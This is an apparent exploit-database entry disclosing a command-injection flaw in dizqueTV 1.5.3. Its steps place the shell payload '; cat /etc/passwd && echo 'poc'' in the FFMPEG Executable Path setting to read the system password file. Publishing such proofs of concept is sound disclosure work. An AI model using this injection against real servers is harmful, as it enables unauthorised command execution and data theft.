
4 changes to exploits/shellcodes/ghdb dizqueTV 1.5.3 - Remote Code Execution (RCE) reNgine 2.2.0 - Command Injection (Authenticated) openSIS 9.1 - SQLi (Authenticated)
22 lines
No EOL
632 B
Text
22 lines
No EOL
632 B
Text
# Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE)
|
|
# Date: 9/21/2024
|
|
# Exploit Author: Ahmed Said Saud Al-Busaidi
|
|
# Vendor Homepage: https://github.com/vexorian/dizquetv
|
|
# Version: 1.5.3
|
|
# Tested on: linux
|
|
|
|
POC:
|
|
|
|
## Vulnerability Description
|
|
|
|
dizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers.
|
|
|
|
## STEPS TO REPRODUCE
|
|
|
|
1. go to http://localhost/#!/settings
|
|
|
|
2. now go to ffmpeg settings and change the FFMPEG Executable Path to: "; cat /etc/passwd && echo 'poc'"
|
|
|
|
3. click on update
|
|
|
|
4. now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd |